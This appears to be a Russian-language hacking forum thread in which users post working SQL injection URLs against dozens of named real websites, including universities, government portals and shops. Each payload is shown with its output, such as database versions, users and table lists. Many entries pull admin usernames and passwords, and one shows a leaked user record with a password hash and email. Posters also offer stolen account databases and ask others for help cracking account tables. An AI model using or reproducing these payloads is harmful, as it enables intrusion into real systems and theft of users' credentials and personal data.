www.ckhi.com.ua
ТИЦ:10
http://www.ckhi.com.ua/showdir.php?dir_code=-25+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6,7Version():4.1.22-standard
User():ckhi_db01@213.186.117.118
Database():ckhi_db01



www.buderotic.com
ТИЦ:10
PR:2
http://www.buderotic.com/shop.php?type=-5+union+select+concat_ws(0x3a,version(),user(),dat abase()),2,3Version():5.0.85
User():buderoti_site@localhost
Database():buderoti_buderotic



www.centerpack.com.ua
ТИЦ:60
PR:2
http://www.centerpack.com.ua/news.php?item_id=-1+union+select+1,2,3,concat_ws(0x3a,version(),user (),database()),5,6,7,8,9,10Version():4.1.22-standard
User():centerpa_r@localhost
Database():centerpa_builder



www.marlin-yug.com
PR:4
http://www.marlin-yug.com/shownews.php?news_id=-32+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6,7Version():5.0.67-community
User():marlin_db1@localhost
Database():marlin_db1

http://www.business-region.com.ua/index_main.php?p=52&du=-5727 union select 1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22 --

version || 4.1.22-standard-log

Русь-Банк-Урал

http://www.kbdu.ru/page.php?p=1306+and+(select+substring(version(),1, 1))=5

банк!

http://las.arts.ubc.ca/las4/people.php?people=-6+UNION+SELECT+1,2,version(),4,5,6,7/*
4.0.17-standard 2

искал багу чисто изза названия домена..........

stevens.usc.edu pr6
USC Stevens Institute for Innovation
http://stevens.usc.edu/playvideo.php?v=null union select null,null,null,null,concat_ws(0x2f,0x3C73637269707 43E616C6572742827,version(),user(),database(),0x27 293C2F7363726970743E),null,null,null,null,null,nul l,null,null,null
http://stevens.usc.edu/playvideo.php?v=null union select null,null,null,null,concat(user_login,0x2f,user_pa ssword,0x2f,users_levels_id),null,null,null,null,n ull,null,null,null,null FROM praxis_uscstevens.users limit 0,15.0.22/uscstevens@localhost/praxis_uscstevens

пр5
http://www.ihm.gov.mo/en/about/news_detail.php?id=-27+UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),v ersion()),5--
ihmsql@localhost : ihm : 5.1.16-beta
http://www.sport.gov.mo/web/en/news/details.php?id=-1235+and+1=0+Union Select 1 ,CONCAT_WS(CHAR(32,58,32),user(),database(),versio n()),3,4--
idm@localhost : IDM2 : 4.0.27-standard-log

http://www.marschen.se/viewpage.php?page=-1+union+select+concat_ws(0x3a,version(),user(),dat abase())+--+

version()- 4.1.22-standard
user() - marschen_marsche@localhost
database() - marschen_iylpublisher

http://adamov-web.ru/web.php?id=1+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYP T(CONCAT(0x7873716C696E6A626567696E,Version(),0x2F 2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E 6A656E64),0x71),0x71),3

Database Version: 5.0.26-log
Database name: vyazantiya
User name: vyazantiya@localhost

http://rupeetalk.com/more_review.php?product_id=6&product_item_id=-15+union+select+concat_ws(0x3a3a,admin_id,name,ema il_id,password,roll_type)+from+rupee_admin_user+/*+&ext=gif&bank_id=17

http://www.gumagumalu.com/recipes/recipe.html?rid=-2039+union+select+1,2,3,4,5,6,7,8,9,10,11+--+


http://www.onlinerealtysales.com/p/p/reviews/more_review.php?review=-13692'+union+select+1,2,3,concat_ws(0x3a3a,id,leve l,username,password,email),5,6,7,8,9,10,11,12,13,1 4,15+from+lore_users+--+&site=1028160064

http://www.swamijobs.com/showjob.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,concat_ws(0x3a3a,id,emp_i d,uname,passwd,email,team,level,status,lastlogin,l ogincount),25,26,27+from+authuser+limit+3,1+--+

http://wminyc.org/event.php?id=-875+union+select+1,2,3,4,5,6,7,8,9,version(),1,2,3 ,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8 ,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3 ,4,5,6,7,8,9,0,1,2,3,74/*

Database Version: 4.1.25-Debian_mt1-log
Database name: worldmusicinstitute_org_-_ucms
User name: worldmusicinst@64.13.192.35

http://www.swp.ie/index.php?page=-362+union+select+1,2,3,4,concat_ws(0x3a,user(),dat abase(),version()),6,7,8,9,10,11+--+&dept=News

Version: 5.0.45-log
Database Name: social1_swp09
User: social1_root@web22.hosting365.ie

http://www.cap-pr.de/web.php?id=80+UNION+SELECT+1,2,3,version(),5,6,7,8 +LIMIT+1,1[CODE]

Database Version: 5.0.51a-3ubuntu5.4
Database name: db98448
User name: U98448@localhost

http://www.s4c.co.uk/darllendafi/book_detail_e.php?id=1;select+cast(version()+as+in t)

PostgreSQL 8.3.3 64-bit on i386-pc-solaris2.10, compiled by /ws/on10-tools/SUNWspro/SS11/bin/cc -Xa

http://www.mathsrevision.net/alevel/pages.php?page=-44+unIon+sELeCT+1,2,3,4,5,concat_ws(0x3a,user(),da tabase(),version())+--+
user() - mathsrevisio@192.168.0.14
database() - mathsrevisio
version() - 4.1.22-standard-log

http://www.spravka09.ru/world/world.php?area=1097&world=41113'+union+select+concat_ws(0x3a,user(),da tabase(),version())/*
u43321@localhost
u43321
5.0.4

ney.be pr4
Ney and Partners is a structural engineering consultancy
http://www.ney.be/en/fiche-projets.php?pid=null union select 1,2,3,concat_ws(0x207C20,version(),user(),database ()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38 ,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,5 5,56,57,58,59
http://www.ney.be/en/fiche-projets.php?pid=null union select 1,2,3,concat_ws(0x207C20,username,password),5,6,7, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41, 42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 ,59 from ney_be.users limit 0,1
5.0.45 | ney_be@localhost | ney_be

http://www.pingviini.fi/www/page.php?id=175+UNION+SELECT+1,2,3,version(),5,6,7 ,8,9,10,11,12,13,14,15+LIMIT+1,1/*

Database Version: 4.1.20
Database name: ilmari_pingviini
User name: ilmari239@localhost

http://www.parlok.fi/www/page.php?id=38+UNION+SELECT+version(),2,3,4,5/*

Database Version: 4.1.20
Database name: ilmari_parlok
User name: ilmari070@localhost

http://www.agdr.goias.gov.br/index.php?idMateria=1;select+cast(version()||chr(5 8)||inet_server_port()||chr(58)||current_database( )+as+int)


PostgreSQL 8.1.5 on i386-pc-solaris2.10, compiled by GCC gcc (GCC) 3.4.6:5432:sgc

www.fanbay.se
Что-то про фильмы музыку итд.
http://www.fanbay.se/buy/index.asp?movie_id=15&company_id=1=(select+@@version)
5.0.27-community-nt

PR 5
http://tender.admoblkaluga.ru/old/arc.php?id=-14+union+select+1,@@version---
PR 4
http://www.poordesigner.com/detalle.php?id=370+union+seLect+1,2,3,4,5,concat_w s(0x3a,database(),version(),user()),7,8,9,10,11,12 ,13,14,15,16,17,18+limit+1,1--
PR 4
http://www.securemetric.com/articles-d.php?id=-5+union+select+1,concat_ws(0x3a,database(),version (),user()),3,4,5--

http://www.butilka.ru/catalog_wine.html?group=_absent&id=-11)+unIon+sElecT+1,concat_ws(0x3a,%20user(),databa se(),version()),3,4,5,6,7,8,9,10,11,12,13+--+

User: visitor@localhost
Database: butilka
Version: 5.0.70-log

http://www.asp.wroc.pl/wyswietl_konkurs.php?id=-202+UNION SELECT CONCAT_WS(CHAR(32,58,32),user(),database(),version ()),2,3,4,5,6--
asp@localhost : asp_site : 4.1.22-log
http://www.usbe.umu.se/news/news_eng.php?ID=-00000001644+UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),versi on()),3--
usbe_webb@localhost : USBE_news : 5.0.54-log

http://slovco.ru/sovremslov/yu/podrobno.php?id=-536+union+select+1,2,concat_ws%280x3a,user%28%29,d atabase%28%29,version%28%29%29,4,5--

root@localhost:slovco:5.0.60-log

http://www.altaservisnsk.ru/index.php?id=-6+union+select+1,concat_ws(0x3a,version(),database (),user())--
5.0.81-community:ipdenis_altaservis:ipdenis_admin@localho st

http://www.deti.spb.ru/writers_rus/?a_id=-121+union+select+1,2,concat_ws(0x3a,version(),data base(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17--
5.0.33:deti_test:deti@localhost

http://shoprusbook.ru/ulist.php?g=-109597+union+select+1,2,3,version(),5,6,7,8,9,10,1 1,12,13,14,15,16,17--
5.0.67

Apache/2.2.8 (Fedora)
PHP/5.2.6
http://spartak.tambovsport.ru/champ/online.php?id=63'
http://spartak.tambovsport.ru/champ/online.php?id=63+and+1=0+ Union Select UNHEX(HEX([visible])) ,2,3,4,5,6
6 columns
user tambovsport@localhost
Database tambovsport

http://wordtrans.org/engine/index.php?action=docs&name=-clients'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26+--+

http://www.nwinnovation.com/showjob.php?id=2493+union+select+1,2,3,4,5,group_c oncat(table_name),7,8,9,10,11,12,13+from+informati on_schema.tables+group+by+table_schema+/*+


http://www.gamachejobs.com/showjob.php?jobid=-135+union+select+1,2,3,4,5,table_name,7,8,9,10,11, 12,13,14,15,16,17,18,19+from+information_schema.ta bles+--+


http://www.51hengtianran.com/en/showjob.php?id=89&idd=-6+union+select+1,2,3,4,5,6,7,8+from+admin+/*+

http://hrjobs.com/showjob.php?id=-1+union+select+1,2,concat_Ws(0x3a3a,id,passwd,LEVE L,lastseen),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21+from+users+--+

Server:
http://www.kiev.attrade.ru/str/news?yy=2008+and+1=cast((SELECT+version()||chr(58) ||current_user||chr(58)||current_database())+as+in t)--
PostgreSQL 8.2.9 on x86_64-redhat-linux-gnu, compiled by GCC gcc (GCC) 4.1.2 20070626 (Red Hat 4.1.2-14):kiev.attrade:kiev.attrade

TABLES:
http://www.kiev.attrade.ru/str/news?yy=2008+and+1=cast((SELECT TABLE_NAME from INFORMATION_SCHEMA.TABLES LIMIT 1 OFFSET 193)+as+int)--
useraccounts

COLUMNS:
http://www.kiev.attrade.ru/str/news?yy=2008+and+1=cast((SELECT COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME=chr(117) || chr(115) || chr(101) || chr(114) || chr(97) || chr(99) || chr(99) || chr(111) || chr(117) || chr(110) || chr(116) || chr(115) LIMIT 1 OFFSET 1)+as+int)--
gusrid
usrnam1
usrnam2
usremail
usrlogin_sm
usrpwd_sm
usrlogin
usrpwd

P.S.: tnx Ins3t за помощь с Psql

5.0.45-log
PHP/5.2.0-8+etch15
User fifakulte@localhost
Database fifakultecom1
Columns 12
http://www.fifakulte.com/online.php?id=896+and+1=0+ Union Select 1 , UNHEX(HEX([visible])) ,3,4,5,6,7,8,9,10,11,12

P.S Кому нужно могу базу акков скинуть оттуда. Но врятли кому надо)

http://www.sugar-free-games.com/showgame.php?game=-1145+union+select+1,group_concat(table_name,0x3c62 723e),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23+from+information_schema.tables+where+t able_schema=database()

Скулка на хостинге. Если чего наковыряете напишите мне в лс.
PHP/5.2.0-8+etch15
User hostacci_client@localhost
Database hostacci_client
Columns 5
http://www.hostaccion.com/?p=contrato-online.php&id=13+and+1=0+ Union Select UNHEX(HEX([visible])) ,2,3,4,5

http://www.marketcatalog.info/news.php?newsId=-78+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user()),4,5,6,7--

http://www.torgovec.com/news.php?newsId=-967+union+select+1,2,concat_ws(0x3a,version(),data base(),user()),4,5,6,7--

http://www.alloffshore.net/news.php?newsId=-967+union+select+1,2,concat_ws(0x3a,version(),data base(),user()),4,5,6,7--
на 1 хосте)
5.0.37-standard:admin_ecommerce:admin_ulisss@localhost
http://my-sky.org/news.php?form_id=-47+union+select+1,concat_ws(0x3a,version(),databas e(),user()),3,4,5,6--&form_current_page=0
5.0.45-Debian_1-log:myskyorg:myskyorg@localhost
http://ukrsvit.net/news.php?id=-354+UNION+SELECT+1,2,CONCAT(0x7873716C696E6A626567 696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,Us er(),0x7873716C696E6A656E64)
см подробнее к 1 картинке =)
5.0.70-log/**/ukrsvit/**/ukrsvit@localhost
http://seowars.ru/seo-news/news.php?id_news=-585+union+select+1,concat_ws(0x3a,version(),databa se(),user()),3,4,5,6,7,8,9,10,11,12,13,14
тайтл
5.0.81-community:seowars_base:seowars_user@localhost
http://playgame.org.ua/news.php?id=-673+union+select+1,concat_ws(0x3a,version(),databa se(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15
4.1.22-log:freemp3_slovo:freemp3_slovo@192.168.1.7

celticarts.org pr5
The Celtic Arts Foundation
http://www.celticarts.org/index.php?page_id=4+and+substring(version(),1,1)=4 +--+
4.1.22-standard | celticar_user@localhost

http://www.lagam.net/?page=7&itemId=-600+union+select+concat_ws(0x3a,concat_ws(0x3a,use r(),version()),database())/*

ТИЦ: 10
PR: 2

User: status@localhost
Version: 4.1.22-community-nt
Name: l2jdb


Игровой сервер lineage2 =)

PS по серверам ла2 был опыт, все данные интересные лежат в таблице accounts (обычно логин, hash sha-1(base64) и мыло), но тут почему то доступа нет, если кто найдет способ - отпишите пожалуйста в пм.

http://www.halal-world.com/category.php?IndustryID=14+union+select+1,2,concat _ws(0x3a,loginid,password)+from+admin--

--------

http://www.lapythie.free.fr/news/news.php?id=9999999999999999+union+select+1,2,conc at_ws%280x3a,version%28%29,database%28%29,user%28% 29%29,4,5,6,7,8--

http://www.izbushka.ru/page.php?page=13)+and+substring(version(),1,1)=4%2 3&path=2

http://www.erasmus-entrepreneurs.eu/page.php?pid=777777771'+union+select+1,2,3,version (),5,6/*

http://bender.samaratoday.ru/webpage.php?id=19+version()+LIMIT+1,1

Database Version: 5.1.38
Database name: samaratoda_ben
User name: samaratoda_ben@localhost

есть таблица users:username,passwrd

http://www.artgamma.ru/news.php?id=-191+union+select+1,version%28%29,@@version_compile _os,4,database%28%29,6,7,8,9,10,11,12,13,14,15

http://www.bridesathotbobbins.co.uk/?pageid=1+union+select+table_name,2,3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+ information_schema.tables

http://www.casauna.se/showimages.php?mode=left&propertyID=1+union+select+concat(0x3a,version(),us er(),database())/*

5.0.32-Debian_7etch11casauna@localhostCasauna

http://www.retronintendo.net/game.php?id=1/**/aNd/**/substring(version(),1,1)=5
Ветка - 5

***

http://www.feelies.org/game.php?id=1/**/aNd/**/substring(version(),1,1)=3
ветка - 5

***

http://www.energieagentur.nrw.de/_infopool/page.asp?InfoID=486+union+select+1,2,3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,2 6,27%20--

[mysqld-5.0.45-community-nt-log


PR6

http://www.atomicforce.info/News.php?ID=1+union+all+select+1,version(),3,4,5'

http://www.personnelmanagement.co.uk/main/news.php?id=1+and+1=2+union+all+select+1,2,concat( user_login,char(58),user_password,char(58),user_em ail),4,5,6,7,8,9,10,11+from+cms_users--'

http://www.yarochester.info/news.php?id=1+union+all+select+1,2,3,4,version(),6 '

http://www.wellfield-stud.co.uk/read-news.php?id=1+and+1=2+union+all+select+1,concat(us ername,char(58),password),3,4+from+%E2%80%8Badlogg er_users--'

http://www.filmorder.ir/news.php?id=1+union+select+1,group_concat(table_na me),3+from+information_schema.tables'

http://lescompagnonsdelafuste.com/news.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10'

http://www.film118.ir/news.php?id=-1+union+select+1,2,3,concat(user,char(58),pass),5+ from+user'

http://www.kadinonline.com/news.php?id=1-1+UNION+SELECT+0x65727230722d31--'
:o

http://www.pdamarket.ru/show_cat2.php?grid=-46+union+select+concat_ws%28char%2858%29,username, password%29+from+admin

http://www.shindaiwa.ru/show_cat2.php?grid=-5+union+select+concat_ws(char(58),username,passwor d)+from+admin

Убило

Полезные статьи по взлому и хакингу

http://bestxaksoft.ru/article_view.php?id=-1'+union+select+1,concat_ws(0x3a,user(),database() ,version()),3,4,5/*

jorikirudik@localhost:h3736_jorikvartanoff:4.1.20-log

[PR 8] [тиЦ 600]
http://www.nd.edu/~ccl/news.php?id=-6+union+select+concat_ws(0x3a,version(),database() ,user()),2,3,4,5--

http://www.khartoum-ppu.gov.sd/law_d.php?id=-5+UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),versi on()),3,4,5--
felamedc_plan@localhost : felamedc_ppu : 5.0.81-community-log

Тут вроде можно заказать журнал хакера =) за 70 уе кажись

http://www.rustv.de/club/shop/article.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),version (),database()),5,6,7,8,9,10,11,12,13,14,15,16--

rustv@localhost:5.0.51b-community:db25865

http://www.studbook.co.za/voteresult.php?hofie=Stem%20resultate&header=Voting%20results&id=1+and+1=cast((select+version())+as+int)

PostgreSQL 8.1.11 on i686-redhat-linux-gnu, compiled by GCC gcc (GCC) 4.1.2 20070626 (Red Hat 4.1.2-14)

http://www.cse.salford.ac.uk/news.php?newsID=-226'+union+select+1,2,concat_ws(0x3a3a,username,pa ssword),6,5,6,7,8,9,10,11+from+users+/*+

PR6
http://www.avalonmedical.co.uk/showjob.php?id=-68'+union+select+1,2,3,concat_ws(0x3a3a,id,usernam e,pwd),5,6,7,8,9+from+users+limit+2,1+/*+

http://www.jobsintimmins.com/showjob.php?id=-254'+uNioN+seLeCt+1,group_concat(table_name),3,4,5 ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 ,24,25,26+from+information_schema.tables+--+


http://www.infoserbia.com/jobs/sr/showjob.php?id=429&cid=-443'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15+/*+

пр5
http://www.cenal.gob.ve/noticias/nota.php?id=-321+UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),versi on()),3,4,5,6,7,8,9,10--
jp000297@localhost : jp000297 : 5.0.67

http://www.mensa.org/nationalinfo.php?country=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33%20--

4.1.22:mensaint_main:mensaint_user@localhost

PR7

http://www.dynamicchiropractic.com/mpacms/dc/article.php?id=-53798+union+select+1,2,3,4,5,6,7,8,9,0,1,version() ,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,30/*

-----------------------------------------------------------------------------------------

PR 6
http://performingarts.nd.edu/index.php?page=detail&event=-1094+union+select+1,2,3,4,5,6,version(),8,9,0,1,2, 3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7, 8,9,0,1,42+from+mysql.user/*

Database Version: 4.0.25-standard
Database name: dpac
User name: dpac@localhost

Извиняюсь, не смог посмотреть офтоп

Говномания
http://www.govnomania.ru/admin

http://www.govnomania.ru/index.php?sbjoke_id=-1+union+select+0,1,2,3,%20concat_ws(sbadmin_pwd,0x 3a,sbadmin_name),5,6,7,8,9,10+from+sbjks_admin--

http://www.jokelogic.com/index.php?sbjoke_id=-1+union+select+0,1,2,sbadmin_name,sbadmin_pwd,5,6, 7,8,9,10+from+sbjks_admin--

админка там же

http://mansvu.mans.edu.eg/pm/forms/frm_worker_overview.php?worker_id=1+union+select+1 ,concat_ws(0x2a,version(),user(),database()),3,4,5 ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 ,24,25


5.0.51a-24+lenny1elu@10.10.200.1project_management

http://www.lankahub.com/category.php?IndustryID=2+union+select+1,2,concat_ ws(0x3a,loginid,password)+from+admin--

http://codim.org.il - PR=3

http://codim.org.il/game.php?id=1/**/anD/**/1=2/**/uniON/**/aLl/**/seLEcT/**/1,2,3,version()

Version = 5.0.67-userstats-log
User = codim@piratecity.com
Database = codim1

3 таблы
games
links
system

http://www.whitleyaward.org/display.php?id=31/**/UNION/**/SELECT/**/1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33/**/LIMIT/**/1,1

Database Version: 4.1.22-standard-log
Database name: whit_data
User name: whit_whit@localhost

Видел где-то кто-то продавал бд от сайта
http://buker.beast.kz/ за 25 баксов=))))
кому надо вот бесплатно выкладываю уязвимость

http://buker.beast.kz/index.php?option=com_user&task=doStakeMenu&cid=-38+union+select+1,group_concat(username,0x3a,passw ord+SEPARATOR+0x0b)+from+mos_users+--+

http://buker.beast.kz/index.php?option=com_user&task=doStakeMenu&cid=-38+union+select+1,concat_ws(0x3a,user(),database() ,version())+--+

User : beastkz_buker@localhost
DB : beastkz_buker
Ver : 5.0.67-community

P.s. необходима регистрация на сайте!

http://www.stroyaudit.com/faq.php?id=-16+union+select+1,version%28%29,3--

5.0.81-community-log
pdaomeg_audit
pdaomeg_audit@localhost

фирма аудита :eek:

Greatnorthroad.org pr5
Great North Road website was to provide a forum for expatriates who lived in the British protectorate of Northern Rhodesia
http://www.greatnorthroad.org/names/read.php?id=null' union select concat_ws(char(32,124,32),version(),user(),databas e()),null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null, null,null,null,null,null+--+
4.1.22 | gnrweb@localhost | gnr

http://paragon.by/shop.php?id=-2110+union+select+1,2,concat_ws%280x3a,database%28 %29,user%28%29,version%28%29%29,4,5,6,7,8,9,10,11, 12,13,14/*&category=248&mode=detail

paragonby:paragonby@eclipse.tutby.com:4.0.27-log

http://velograd.ru/show_cat2.php?grid=-1+union+select+concat_ws%280x3a,username,password, user%28%29,version%28%29%29+from+admin--

veloadmin:nInzyAturTl3:velograd@localhost:5.0.67-log

http://www.uyut2000.ru/show_cat2.php?grid=-12000+union+select+1

версия 4.0.27

удачи в жизни

http://www.kurierustecki.pl/artykul.php?id=-98/**/UNION/**/SELECT/**/1,2,3,4,5,6,7

Database Version: 5.0.77+tld4-log
Database name: baza10_pks_media
User name: a10_pks_media@5E98C36E.static.tld.pl

Getting Data from table adder_user from database baza10_pks_media
Fields user:pass:email

[1]:agprint:1afeec4165629ac0fc96334a66ac3fe1:dtp@agme dia.com.pl

http://www.click-net.ru/index.php?page=0&newsid=-1+union+select+1,2,3,4,5,6--

Version: 4.0.26-nt-max

Gaucher.org.uk pr5
Gaucher Disease and the Association
http://www.gaucher.org.uk/enews.php?id=null union select null,concat_ws(char(32,124,32),version(),user(),da tabase()),null,null,null
5.0.45 | adming@server213-171-218-135.livedns.org.uk | gaucher

PR7
http://www.dhi-paris.fr/index.php?id=termine&L=-1'+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3 a3a,username,password),12,13,14,15,16,17,18,19,20+ from+be_users+/*+&tx_dhipevent_pi1[calDay]=24&tx_dhipevent_pi1[calMonth]=9&tx_dhipevent_pi1[calYear]=2009&tx_dhipevent_pi1[eventID]=717

http://www.biznismarket.com/category.php?IndustryID=124+union+select+1,2*****
5.0.67.d7-ourdelta-log

http://games.lealta.ru/index.php?option=com_userlist&Itemid=4
в поле search вводим:
-1') union select concat_ws(0x3a,database(),version(),user()),2,3,4, 5,6-- 1
это джумла, там много всего интересного)

http://www.texastechpulse.com/showjob.php?id=885+union+select+1,2,3,4,5,concat_w s(0x3a3a,id,email,web,password,lastlogin),7,8,9,10 ,11,12,13,14+from+users+limit+0,700+/*+

http://utgafa.midlari.is/index.php?act=menu&act_id=-97+union+select+1,2,3,4,5,6,concat_ws(0x3a3a,usern ame,password),8,9,10,11,12,13,14+from+w_users--

http://sjbald.com/index.php?act=menu&act_id=-11+union+select+1,2,3,4,5,concat_ws(0x3a3a,usernam e,password),7,8,9,10,11+from+w_users+--+

http://www.brandugla.net/?act=articles&cat_id=-3+union+select+1,2,concat_ws(0x3a3a,username,passw ord),4,5,6,7,8,9,10+from+w_users+--+&cat_text=Fr%E9ttir

http://www.azap.com.tw/news_detail.php?id=-6+uNiOn+sElEct+1,2,3,'4',5,6,7,8,9,10,11,12+from+i nformation_schema.tables+--+

http://www.techconcepts.co.za/news.php?id=-43+union+select+1,2,3,4,5,6,7,8+--+

http://www.e-pc.co.za/index.php?pageid=-85+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25+/*+

http://www.aveng.co.za/index.php?pageid=-100+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql. user+--+

www.rire-blagues.com
http://www.rire-blagues.com/index.php?sbjoke_id=-1+union+select
+0,1,2,sbadmin_pwd,sbadmin_name,5,6,7,8,9,10+from+ sbjks_admin--

не знаю где админка(

http://www.scancoming.org/spain/?page=1+and+1=cast((select+version())||chr(58)||us er+as+int)

PostgreSQL 8.1.11 on i686-redhat-linux-gnu, compiled by GCC gcc (GCC) 4.1.2 20070626 (Red Hat 4.1.2-14):scancomi

www.susppy.org/news.php?id=-1+union+select+1,2,group_concat(a_user,0x3d,a_pass ,0x3C62723E),4+from+admin
edit:
watch islam
http://www.watchislam.com/videos/index.php?catid=-1+union+all+select+concat(1,char(45),version())

and one more
http://www.hrusa.org/field/listings.php?catid=-1+union+all+select+@@version,user(),null,null--

The Bergen Museum of art
http://www.kunstmuseene.no/default.asp?side=kalender&art=(select+@@version)&enhet=troldhaugen&sp=2
Microsoft SQL Server 2005 - 9.00.1399.06 (X64) Oct 14 2005 00:35:21 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition (64-bit) on Windows NT 5.2 (Build 3790: Service Pack 2)

http://www.al-mawrid.org/pages/item_detail.php?id=-1+union+select+1,2,3,4,5,concat%28table_name,0x20, column_name,0x20,table_schema%29,7,8,9,10,11,12,13 ,14,15,16,17,18+from+information_schema.columns+li mit+1,1/*

--
http://shapeski.net/public/products_details.php?id=-1+union+select+1,2,concat(table_name,0x20,column_n ame,0x20,table_schema),4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22+from+information_schema.co lumns+limit+1,1/*

_http://www.rareearthpottery.com/view_item.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat(table_name,0 x20,column_name,0x20,table_schema)+from+informatio n_schema.columns+limit+1,1

_http://salon-price.com/products.detail.php?pid=-1%20union%20select%201,2,3,4,version%28%29,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24

4kantvoordeel.nl
http://www.4kantvoordeel.nl/game.php?id=1/**/anD/**/1=7%20/**/uniON/**/seLEcT/**/1,conCaT_wS(cHaR(32,42,32),user(),database(),versi on()),3,4
version - 5.0.85
user - 4kant@localhost
database - 4kant
table - gebruikers

http://www.4kantvoordeel.nl/game.php?id=1/**/anD/**/1=7%20/**/uniON/**/seLEcT/**/1,conCaT(naam,0x3a3a3a,wachtwoord),3,4/**/FROM/**/gebruikers/**/LIMIT/**/1,1



n00b.co.il - PR=4 - olololo n00b)))
http://n00b.co.il/game.php?id=1/**/anD/**/1=7/**/uniON/**/seLEcT/**/conCat_wS(cHaR(32,42,32),user(),database(),version ()),2,3
version - 5.0.67-userstats-log
database - n00b_main
user - etay2k@piratecity.com
table - wp_users

http://n00b.co.il/game.php?id=1/**/anD/**/1=7/**/uniON/**/seLEcT/**/conCat(user_login,0x3a3a3a,user_pass),2,3/**/FROM/**/wp_users/**/LIMIT/**/0,1

1662designzone.com pr4
16:62 Design Zone, Pittsburgh’s interior design.
http://www.1662designzone.com/newsrelease.php?news_id=null+union+select+null,con cat_ws(char(32,124,32),version(),user(),database() ),null,null,null,null,null,null,null,null,null,nul l,null,null,null+--+
http://www.1662designzone.com/newsrelease.php?news_id=null+union+select+null,con cat(username,char(32,124,32),password) ,null,null,null,null,null,null,null,null,null,null ,null,null,null+FROM designzo_main.users+limit+0,1+--+
5.0.77-community-log | designzo_sa@localhost | designzo_main

---

http://www.nne.ru/docs.php?gid=-1+UNION+SELECT+1,version()--

PostgreSQL 8.2.7 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.1.3 20070929 (prerelease) (Ubuntu 4.1.2-16ubuntu2)

_http://www.stbuurobot.co.cc/shownews.php?id=1543553+union+select+1,table_name, 3,4,5,6+from+information_schema.tables+limit+161,1

пр6 all
http://www.coes.org.sv/noticias.php?id=-433+UNION SELECT CONCAT_WS(CHAR(32,58,32),user(),database(),version ()),2,3,4,5--coes-1@localhost : coes-1 : 4.1.21-log
http://www.prologic.com.tw/faq/index.php?id=-34+UNION SELECT 1,2,3,4,5,6,CONCAT_WS(CHAR(32,58,32),user(),databa se(),version()),8--
4.0.26-log вывод в исходнике

http://greatplantpick.net/print?searchtype=&id=1;select+cast(version()||chr(58)||user||chr(58) ||current_database()+as+int)

PostgreSQL 8.1.9 on i386-portbld-freebsd6.2, compiled by GCC cc (GCC) 3.4.6 [FreeBSD] 20060305:millergarden:gpp

http://www.corkscrewcustomwine.com/index.php?cat_id=-1 union select concat(table_name,0x20,column_name,0x20,table_sche ma),2,3,4,5,6,7,8 from information_schema.columns&catname=Holiday

=)))
http://learn.ditud.ru/reg.php4?trid=-3+union+select+version()
5.0.21-community-nt

http://www.rentsale.ru/general/opisanie.php?id=-199+union+select+1,2,3,4,5,6,7,8,9,10,11,12,versio n%28%29,14,15,16+from+manager--

Medlinks.ru pr4 тИц=3900
Вся медицина в Интернет. Медицина для врачей и пациентов.
http://www.medlinks.ru/modules.php?op=modload&name=Shop&file=index&do=showpic&pid=400'+and+substring(version(),1,1)=4+--+mysql version: 4.1.20
mysql user: me

ligai.com.ar ---
